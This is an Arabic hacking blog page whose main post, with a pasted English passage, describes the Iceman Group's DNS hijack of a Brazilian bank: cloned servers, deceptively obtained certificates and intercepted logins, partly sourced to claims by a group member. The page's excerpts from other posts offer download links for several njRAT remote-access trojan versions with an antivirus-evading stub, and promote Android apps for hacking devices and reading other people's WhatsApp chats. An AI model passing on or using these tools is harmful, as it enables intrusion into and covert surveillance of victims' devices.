Iceman Group : reveals one of its own hacking operations

في منتصف شهر مايو / أيار 17، كشفت كاسبيرسكي لابس عن هجوم DNS لم يسبق له مثيل على بنك برازيلي لم يكشف عن اسمه والذي حصل في 16 أكتوبر. يبدو أن المهاجمين سيطروا على كل نظام DNS في شبكة البنك، وبذلك تمكنوا من إعادة توجيه جميع حركة المرور المرتبطة بالبنوك من خلال الخوادم الخبيثة الخاصة بهم. استمر الهجوم لمدة 6 ساعات، حيث تم تسريب عدد لا يحصى من معلومات قيمة والخاصة في العملاء لأيدي المهاجمين .
تم الكشف أن المجموعة التي تقف وراء هذا الهجوم كانت "مجموعة رجال الثلج" "Iceman Group”، وهي مجموعة صاعدة في عالم القرصنة المالية.
هذا هو الهجوم المعروف الوحيد لهذه المجموعة، حيث أن معظم الهجمات التي نفذت على ما يبدو من قبل هذه المجموعة لم يتم الكشف عنها .
مرفق المقالة باللغة الانجليزية تشرح بالضبط الطريقة التي استخدمتها المجموعة للنجاح باختراقها للبنك


The Iceman Group started their attack by aiming at the NIC.BR service - the one from which all Brazilian domains get their redirections. From this point on, finding and infecting the DNS servers of the said bank - now revealed to be Banrisul Bank - was a much easier task.

After the successful redirection of the DNS Records of the bank, Iceman turned their own servers into complete replicas of the Bank’s Services. SSL encryption of the traffic aimed for the replica servers was done by tricking the site “Let’s Encrypt” into believing The Iceman’s control over the servers was legit. The individual of the group claims that the group have used an inside access to several bank’s employees email accounts in order to deceive “Let’s Encrypt” company.

Throughout the 6 hours the attack lasted, every login attempt into the bank was transferred through the Iceman Group.

“Let this be a slight warning for you all finance crooks”, those were his last words.

A full interview will be published soon.
http://zepurplehat.blogspot.ch/2017/08/the-iceman-group.html

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining...
Read more

أفضل برامج إختراق أجهزه للأندرويد و تجسس على الشبكه و تجسس على الواتس اب و رؤية محاذثات الواتس اب

  التطبيق الاول هو تطبيق Hackode   و هو واحد من أفضل التطبيقات الختراق لاندرويد و هو تطبيق مهم لكل من يريد دخول اختراق الاجهزة و الشبكات حيث يوجد به العديد من الادوات المهمه فى الاختراق و ختبار أمن الشبكات و المواقع Test Penetration یقدم التطبیق المزایا و الامكانات الاتیة: مھام الاستكشاف و الاستطلاع التى تمكنك من معرف الاجھزة المتصلة بالشبكة المحلیة التى تتصل بھا كشف و فحص منافذ الاتصال فى الاجھزة المرطبطة بالشبكة فحص الثغرات فى الانظمة التى تعمل على الشبكة الاسلكیة تتبع الاجھزة و المسارات لمعرفة تخطیط الشبكة التى تتصل بھا و یقدم المزید من مھام الكشف و تحلیل الشبكة و الجھزة المرتبطة بھا وھو جزء اساسى و مھم فى عملیات اختراق الشبكات او فحص تأمینھا و معرفة الثغرات المتوفر للتحميل  http://www.adyou.me/k56f أو من هنا  http://gsurl.in/4alj أو من هنا  http://picocurl.com/1oOw التطبيق الثانى هو تطبيق اختراق الواتساب للأندروید  ھو تطبیق خطیر لاختراق محادثات الواتس اب على الشبكة اللاسلكیة فیمكنك التطبیق من مشاھدة المحادثات التى یجریھا ا...
Read more